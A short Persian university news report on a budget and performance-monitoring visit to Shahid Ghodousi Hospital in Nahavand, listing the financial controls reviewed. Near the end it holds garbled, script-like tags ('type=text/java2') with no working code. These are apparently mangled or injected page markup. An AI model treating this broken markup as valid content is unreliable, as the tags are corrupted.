در بیمارستان شهید قدوسی شهرستان نهاوند انجام شد:

اجرای پایش عملکرد بودجه ای در بیمارستان شهید قدوسی شهرستان نهاوند

تیم پایش مدیریت برنامه ریزی ، بودجه و پایش عملکرد دانشگاه از بیمارستان شهید قدوسی شهرستان نهاوند بازدید کردند.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، تیم مدیریت برنامه ریزی، بودجه و پایش عملکرد دانشگاه از بیمارستان شهید قدوسی شهرستان نهاوند بازدید کردند.

در این پایش طی برنامه مدون از واحد های مختلف مراکز مذکور از جمله واحد درآمد و مالی، طبق سنجه های استاندارد و چک لیست های تدوین شد با اولویت بر سه اصل ” کنترل تفاهم نامه های داخلی” ، “صحت سنجی درخواست تخصیص منابع توسط واحد و نحوه هزینه کرد اعتبارات تخصیصی” و “شناسایی و ثبت به هنگام اسناد هزینه در واحدها” مورد بررسی و ارزیابی قرار گرفت.

 

 <2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *